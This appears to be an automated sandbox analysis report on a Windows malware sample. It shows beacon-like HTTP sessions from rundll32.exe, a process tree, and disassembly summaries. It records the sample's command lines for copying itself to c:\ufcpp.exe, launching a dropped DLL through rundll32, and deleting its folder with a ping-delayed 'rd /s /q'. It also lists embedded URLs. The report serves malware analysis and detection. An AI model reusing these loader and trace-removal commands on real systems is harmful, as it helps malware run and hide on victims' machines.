                                              3 | 192.168.2.4 | 50001 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:04 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.4 | 50042 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:08 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.4 | 50081 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:12 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.4 | 50124 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:16 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.4 | 50169 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:20 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.4 | 50217 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:24 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.4 | 50314 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:32 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.4 | 50384 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:36 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.4 | 50454 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:40 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.4 | 50544 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:44 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.4 | 50813 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:52 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.4 | 51017 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:25:56 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.4 | 51249 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:26:00 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.4 | 51630 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:26:08 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.4 | 55345 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:26:16 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.4 | 57162 | 202.108.0.52 | 443 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-11 15:26:20 UTC | 238 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Target ID:0
                                              Start time:10:24:25
                                              Start date:11/12/2024
                                              Path:C:\Users\user\Desktop\otsIBG7J9b.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\otsIBG7J9b.exe"
                                              Imagebase:0x400000
                                              File size:72'381 bytes
                                              MD5 hash:8A971E9FE9FA2C3005EE1EB9C143B331
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:10:24:25
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c ping 127.0.0.1 -n 2&c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:10:24:25
                                              Start date:11/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:10:24:25
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\PING.EXE
                                              Wow64 process (32bit):true
                                              Commandline:ping 127.0.0.1 -n 2
                                              Imagebase:0xc80000
                                              File size:18'944 bytes
                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:10:24:26
                                              Start date:11/12/2024
                                              Path:C:\ufcpp.exe
                                              Wow64 process (32bit):true
                                              Commandline:c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
                                              Imagebase:0x400000
                                              File size:72'438 bytes
                                              MD5 hash:1B4C7D94BCF61F9CCE0B29C2D879EE73
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:5
                                              Start time:10:24:26
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:c:\windows\system32\rundll32.exe "c:\agtve\yhnvs.dll",init c:\ufcpp.exe
                                              Imagebase:0xaf0000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:7
                                              Start time:10:24:41
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init
                                              Imagebase:0xaf0000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:10:24:42
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"
                                              Imagebase:0x310000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:10:24:42
                                              Start date:11/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:10:24:42
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\PING.EXE
                                              Wow64 process (32bit):true
                                              Commandline:ping 127.0.0.1 -n 3
                                              Imagebase:0xc80000
                                              File size:18'944 bytes
                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:10:24:50
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init
                                              Imagebase:0xaf0000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:14
                                              Start time:10:24:50
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:15
                                              Start time:10:24:50
                                              Start date:11/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:10:24:50
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\PING.EXE
                                              Wow64 process (32bit):true
                                              Commandline:ping 127.0.0.1 -n 3
                                              Imagebase:0xc80000
                                              File size:18'944 bytes
                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:10.2%
                                                Dynamic/Decrypted Code Coverage:3.3%
                                                Signature Coverage:8.2%
                                                Total number of Nodes:183
                                                Total number of Limit Nodes:5

                                                Control-flow Graph

                                                APIs
                                                • __p___argv.MSVCRT ref: 00401253
                                                  • Part of subcall function 00401140: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040117B
                                                • __p___argv.MSVCRT ref: 00401274
                                                  • Part of subcall function 00401140: ReadFile.KERNELBASE(00000000,?,00001000,?,00000000), ref: 004011C2
                                                  • Part of subcall function 00401140: CloseHandle.KERNELBASE(00000000), ref: 004011FD
                                                • Sleep.KERNEL32(00000064), ref: 00401286
                                                • GetTickCount.KERNEL32 ref: 004012CD
                                                • wsprintfA.USER32 ref: 004012EA
                                                • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
                                                • Sleep.KERNELBASE(00000064), ref: 00401321
                                                • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401331
                                                • Sleep.KERNELBASE(00000064), ref: 00401339
                                                • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00401349
                                                • CloseHandle.KERNELBASE(00000000), ref: 00401350
                                                • __p___argv.MSVCRT ref: 0040137D
                                                • wsprintfA.USER32 ref: 0040139A
                                                • WinExec.KERNEL32(?,00000000), ref: 004013AD
                                                • Sleep.KERNELBASE(000001F4,?,?,?,?,00000000,?), ref: 004013B8
                                                • ExitProcess.KERNEL32 ref: 004013BC
                                                Strings
                                                • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 00401394
                                                • c:\%s.exe, xrefs: 004012DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: File$Sleep$__p___argv$CloseCreateHandleWritewsprintf$CountExecExitProcessReadTick
                                                • String ID: c:\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
                                                • API String ID: 529022016-1443030469
                                                • Opcode ID: 66cdd9089e5af76c599511ada205c2659a24278b25b1261c6a6c7d148cee0f40
                                                • Instruction ID: 9f8aa6881b80f391e29a048e327f9647279769309d18573ee161f45e2535dee3
                                                • Opcode Fuzzy Hash: 66cdd9089e5af76c599511ada205c2659a24278b25b1261c6a6c7d148cee0f40
                                                • Instruction Fuzzy Hash: 2B418171504341AFD310EF64DC45FAB7BA9EFC8704F04093DF245AB2E1DA7496048BAA

                                                Control-flow Graph

                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040117B
                                                • ReadFile.KERNELBASE(00000000,?,00001000,?,00000000), ref: 004011C2
                                                • CloseHandle.KERNELBASE(00000000), ref: 004011FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleRead
                                                • String ID:
                                                • API String ID: 1035965006-0
                                                • Opcode ID: 50e04a863f428a76645a255525e8b530e81a62b19e13fed04084e6c9b05c1cd9
                                                • Instruction ID: 90d227093b93e33c59d7a42948e498c78a4efe9ee397008c3d7e124e3062c49f
                                                • Opcode Fuzzy Hash: 50e04a863f428a76645a255525e8b530e81a62b19e13fed04084e6c9b05c1cd9
                                                • Instruction Fuzzy Hash: BC21B431304345ABE724CA28DC41BEBB3D5FB88715F40493DFB95E72D0C6B8A9488A5A

                                                Control-flow Graph

                                                APIs
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00415FE0
                                                • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,?), ref: 00416153
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: Virtual$FreeProtect
                                                • String ID:
                                                • API String ID: 2581862158-0
                                                • Opcode ID: af8375059041f43eb7b739a3b30046c93744f04c90da5dd6509c3269b4ceb1ad
                                                • Instruction ID: b5095fd7398c27d52b9b4c2b60e65f433afccfdda2a0a88fef6c4a84fe82fa18
                                                • Opcode Fuzzy Hash: af8375059041f43eb7b739a3b30046c93744f04c90da5dd6509c3269b4ceb1ad
                                                • Instruction Fuzzy Hash: 4D6119326002109FDB25CA14CC847E6BB75EF89314F29449AD5899B381D379EDC2CB55
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00A90625
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A90658
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1679936334.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_a90000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction ID: d3edc25324619c31906757ebce73af4fffde0c11dd4b04b4aaa1fd6e89d5297f
                                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction Fuzzy Hash: 8721D435B00219BFDF008F658C45BEEFBF5EB54394F60C162EA10A2280E7744A519B50

                                                Control-flow Graph

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,00000086,HTM), ref: 004013E4
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 004013FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoad
                                                • String ID: %s "%s",init %s$%s\%s.dll$D$HTM$WinSta0\Default$c:\%s$c:\windows\system32\rundll32.exe
                                                • API String ID: 2619053042-2457680838
                                                • Opcode ID: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
                                                • Instruction ID: 5c017b3d947436da3a79cbd575b5788da6cc5bd4b656b3589a3b64b7cb9d4a99
                                                • Opcode Fuzzy Hash: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
                                                • Instruction Fuzzy Hash: DA71E5716083806FD3218B24CC45BEB7BD5EB89704F00492DF6C9AB2D1DAB995098B9B

                                                Control-flow Graph

                                                APIs
                                                • IsIconic.USER32(?), ref: 00401DEA
                                                • SendMessageA.USER32(?,00000027,?,00000000), ref: 00401E1B
                                                • GetSystemMetrics.USER32(0000000B), ref: 00401E29
                                                • GetSystemMetrics.USER32(0000000C), ref: 00401E2F
                                                • GetClientRect.USER32(?,?), ref: 00401E3C
                                                • DrawIcon.USER32(?,?,?,?), ref: 00401E74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                • String ID:
                                                • API String ID: 2166663075-0
                                                • Opcode ID: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
                                                • Instruction ID: db773ba51d367e258aaa0001d282ccedd816923d488996b04dffdd7d1b0f9207
                                                • Opcode Fuzzy Hash: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
                                                • Instruction Fuzzy Hash: 62117CB12047029BC214DF79DD89D6BB7E9FFC8304F084A2DB58AD3290DA34E905CB59

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                • String ID:
                                                • API String ID: 801014965-0
                                                • Opcode ID: 41c4c4fb87addf5f86e7c459d09dd59d2deec0db5ee8492f51d93a0d0e41125f
                                                • Instruction ID: b84817577bdd794c3584b55ee7e6e144752272faa3ca625d9eeea178d453bb24
                                                • Opcode Fuzzy Hash: 41c4c4fb87addf5f86e7c459d09dd59d2deec0db5ee8492f51d93a0d0e41125f
                                                • Instruction Fuzzy Hash: BB416AB1C04748AFDB20DFA4DD45A6A7BB8EB49714B20027EE651B72E1D7385840CF69

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: InitializeUninitialize_mbscmp
                                                • String ID: http://192.168.100.83/$http://192.168.100.83/9.htm$http://192.168.100.83/F.htm
                                                • API String ID: 2492722006-1795800369
                                                • Opcode ID: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
                                                • Instruction ID: a67ed12fd00eb966c7ef07626c931287be5c1ca5e9acac2baddc7c0ca8bee009
                                                • Opcode Fuzzy Hash: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
                                                • Instruction Fuzzy Hash: F061BE70604302AFD710EF64C989B1BBBA8AF88714F04496DF985EB3D1DB78D905CB96

                                                Control-flow Graph

                                                APIs
                                                • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00402759
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402768
                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00402785
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402794
                                                • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 004027D0
                                                • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004027DF
                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004027FC
